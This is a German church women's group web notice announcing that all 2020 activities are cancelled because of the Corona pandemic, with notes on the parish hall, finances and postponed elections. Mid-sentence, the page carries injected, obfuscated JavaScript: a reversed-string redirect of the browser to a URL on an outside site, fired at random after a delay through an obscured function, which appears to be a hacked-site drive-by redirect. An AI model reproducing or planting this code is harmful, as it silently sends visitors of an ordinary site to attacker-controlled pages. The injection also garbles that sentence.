Skip to content Skip to main navigation Skip to footer

Information der Frauengemeinschaft St. Jakobus d.Ä. Lichtringhausen

Corona ist und bleibt das Thema in diesem Jahr. Auch wenn mittlerweile Lockerungen durchgeführt wurden, wollen wir uns nicht der Illusion hingeben, dass wir wieder zum normalen Alltag zurückkehren können. Nach dem Ende der Urlaubszeit und den Beginn des normalen Schulalltags wird uns noch eine zweite Welle einholen.

Um das Risiko nicht unnötig zu erhöhen, hat der Vorstand daher beschlossen, alle geplanten Aktivitäten für das Jahr 2020 zu streichen. Diese Entscheidung mag für manche unverständlich und übertrieben sein, aber es ist immer ein Unterschied, ob ein Treffen im privaten Rahmen stattfindet oder als Veranstaltung eines Vereines, der im Falle eines Falles haftbar gemacht werden kann. Zurzeit kann im Pfarrheim nur der Saal ohne Toilettenanlage und Küche benutzt werden. Allerdings muss immer eine Person per Unterschrift die Verantwortung übernehmen. Ich bin sicher, dass sich alle auf die angekündigten Aktivitäten gefreut haben, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch bitten wir hier um Verständnis. 2021 wird hoffentlich ein besseres Jahr.

Das Geschäftsjahr ist erst im Herbst beendet, so dass es noch keinen Kassenbericht gibt. Wer nicht bis zur nächsten Generalversammlung in 2021 warten möchte, kann sich jederzeit bei Corinna Rauterkus Informationen einholen. Die Ehrungen werden natürlich in 2021 nachgeholt. Das gilt auch für die anstehenden Wahlen. Der Vorstand ist für die Mitglieder telefonisch, per Mail oder auch persönlich erreichbar. Sollte es Fragen oder Probleme geben kann uns jeder ansprechen.

Ich hoffe, dass wir alle gesund durch diese Pandemie kommen.

LG
Ute Lübke